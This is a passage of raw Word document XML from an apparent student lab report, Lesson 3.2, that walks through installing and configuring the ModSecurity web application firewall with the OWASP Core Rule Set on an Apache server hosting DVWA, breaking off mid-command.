    <w:p w14:paraId="2D624F77" w14:textId="7CAB140E" w:rsidR="0032352E" w:rsidRPr="0032352E" w:rsidRDefault="0032352E" w:rsidP="0032352E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It says that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rejected a query which is the purpose of HIDS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DE37C3" w14:textId="77777777" w:rsidR="0032352E" w:rsidRDefault="0032352E" w:rsidP="00DA34CB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E9695A" w14:textId="4A2D5C50" w:rsidR="0032352E" w:rsidRDefault="0032352E" w:rsidP="00DA34CB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="493B5363" w14:textId="77777777" w:rsidR="0032352E" w:rsidRPr="0032352E" w:rsidRDefault="0032352E" w:rsidP="0032352E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A3CF6D" w14:textId="77777777" w:rsidR="0032352E" w:rsidRDefault="0032352E" w:rsidP="00DA34CB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21319A74" w14:textId="46140F48" w:rsidR="00DA34CB" w:rsidRDefault="00DA34CB" w:rsidP="005325E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc114777180"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lesson 3.2</w:t>
      </w:r>
      <w:r w:rsidR="006F531D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="006F531D" w:rsidRPr="006F531D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web Application Firewalls</w:t>
      </w:r>
      <w:r w:rsidR="006F531D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="6CF98634" w14:textId="114F0CC6" w:rsidR="00DA34CB" w:rsidRDefault="00DA34CB" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web Application Firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A9B364" w14:textId="69C8BCE6" w:rsidR="00DA34CB" w:rsidRDefault="00DA34CB" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I will deploy a WAF (mod security) to a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> server, then I will go to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> website to test whether the mod security is working or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5503BAEA" w14:textId="5B50F34E" w:rsidR="00C9116B" w:rsidRDefault="00C9116B" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">After updating &amp; upgrading the system. I need to install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> package using this command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B92DE5D" w14:textId="604670D6"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pt install libapache2-mod-security2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0963B164" w14:textId="6CF16EA4" w:rsidR="00C9116B" w:rsidRDefault="00C9116B" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Then I need to enable the module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052E866A" w14:textId="129F4EDB" w:rsidR="00C9116B" w:rsidRDefault="00C9116B" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9116B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9116B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9116B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a2enmod security2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A0E082" w14:textId="0F7F6C72" w:rsidR="00C9116B" w:rsidRDefault="00C9116B" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To check whether I messed up the server or not, I will check localhost/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> between the steps to make sure the server is running without problems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267011B4" w14:textId="5C5AC905" w:rsidR="00C9116B" w:rsidRDefault="00C9116B" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I can fine the package that I just installed in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DEA926" w14:textId="60F3E80D" w:rsidR="00C9116B" w:rsidRDefault="00C9116B" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Let me go there:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B0A3D3" w14:textId="6DDDA5FD" w:rsidR="00DA34CB" w:rsidRDefault="00A6748B" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I need to copy the file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A6748B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modsecurity.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A6748B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-recommended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and paste it on the same folder but without the word “recommended”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B35DE08" w14:textId="404BF95D" w:rsidR="00A6748B" w:rsidRDefault="00A6748B" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I do this to be able to apply some changes to the new file that I will use instead of the recommended one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAA3BDA" w14:textId="355CCE96" w:rsidR="00A6748B" w:rsidRDefault="00A6748B" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This command would copy it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7FFEBF" w14:textId="3736D3F6" w:rsidR="00A6748B" w:rsidRDefault="00A6748B" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6748B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A6748B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A6748B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> cp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r w:rsidRPr="00A6748B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-recommended /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A6748B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A6748B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A6748B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modsecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A6748B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A6748B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modsecurity.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D6E4B79" w14:textId="7FEE62D7" w:rsidR="0045353E" w:rsidRDefault="0045353E" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now I can nano to that file and change its code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7752C1D2" w14:textId="72B2AFB8"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nano /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045353E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045353E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045353E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modsecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045353E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045353E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modsecurity.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C0C2D04" w14:textId="58F53E06" w:rsidR="0045353E" w:rsidRDefault="0045353E" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="697C6FCF" wp14:editId="01F617A1">
            <wp:extent cx="5725160" cy="14547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7D76F947" w14:textId="77777777" w:rsidR="00A6748B" w:rsidRPr="00DA34CB" w:rsidRDefault="00A6748B" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5644FADF" w14:textId="45903144" w:rsidR="00DA34CB" w:rsidRDefault="0045353E" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Save and quit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BEC7E2" w14:textId="29C1C157" w:rsidR="0045353E" w:rsidRDefault="0045353E" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Restart the server and check </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0922DF7B" w14:textId="1D3C9560" w:rsidR="0045353E" w:rsidRDefault="0045353E" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045353E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045353E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045353E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045353E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045353E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> restart apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383B5579" w14:textId="66FEDBFA" w:rsidR="0045353E" w:rsidRDefault="0045353E" w:rsidP="00DA34CB">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="531B6454" wp14:editId="6CD63076">
            <wp:extent cx="5725160" cy="25603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60320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CC3E7A9" wp14:editId="5AB2B187">
            <wp:extent cx="5732780" cy="177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5A49ED72" w14:textId="737F4735" w:rsidR="0045353E" w:rsidRDefault="0045353E" w:rsidP="0045353E">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74DBB290" w14:textId="00F5BF66" w:rsidR="0045353E" w:rsidRDefault="0045353E" w:rsidP="0045353E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server works fine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBC520A" w14:textId="1565304F" w:rsidR="0045353E" w:rsidRDefault="0045353E" w:rsidP="0045353E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now I need to install WAF rules for the server from a git repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FAF36E" w14:textId="23B83AE6" w:rsidR="0045353E" w:rsidRDefault="0045353E" w:rsidP="0045353E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045353E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidRPr="00213BB8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:highlight w:val="lightGray"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/coreruleset/coreruleset.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31196416" w14:textId="361661C4" w:rsidR="0045353E" w:rsidRDefault="0045353E" w:rsidP="0045353E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Then go inside the folder and rename </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>crs-setup.conf.example</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045353E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>crs-setup.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13B15B39" w14:textId="610A6359"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009634F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>crs-setup.conf.example</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009634F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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roofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009634F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>crs-setup.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="669241EB" w14:textId="461ED421" w:rsidR="009634F7" w:rsidRDefault="009634F7" w:rsidP="0045353E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Also move the rules folder to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modsecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27BCD24D" w14:textId="61D93DFE"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mv rules/ /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009634F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009634F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009634F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modsecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009634F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662C1476" w14:textId="5AAD29C7" w:rsidR="009634F7" w:rsidRDefault="009634F7" w:rsidP="0045353E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now I need to edit the security2.conf file to add the rules folder rule to it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4028A12B" w14:textId="393BEBC3" w:rsidR="009634F7" w:rsidRDefault="009634F7" w:rsidP="0045353E">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mods-enabled/security2.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD066BD" w14:textId="57AC9FFC" w:rsidR="009634F7" w:rsidRDefault="009634F7" w:rsidP="0045353E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27434BE2" wp14:editId="6E11524E">
            <wp:extent cx="5725160" cy="20116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011680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="148273DF" w14:textId="6BA3E602" w:rsidR="009634F7" w:rsidRDefault="009634F7" w:rsidP="009634F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09BBDD2E" w14:textId="5ABDE2BD" w:rsidR="009634F7" w:rsidRDefault="009634F7" w:rsidP="009634F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I added the second Include statement to add the rules that I just cloned from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B05DA7" w14:textId="0D4EA0D6" w:rsidR="009634F7" w:rsidRDefault="009634F7" w:rsidP="009634F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, I just need to make sure that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can detect and block any suspicious activity. To achieve this, I need to add 2 lines of code to a file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7CE419" w14:textId="7317E351" w:rsidR="009634F7" w:rsidRDefault="009634F7" w:rsidP="009634F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009634F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009634F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009634F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nano /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009634F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
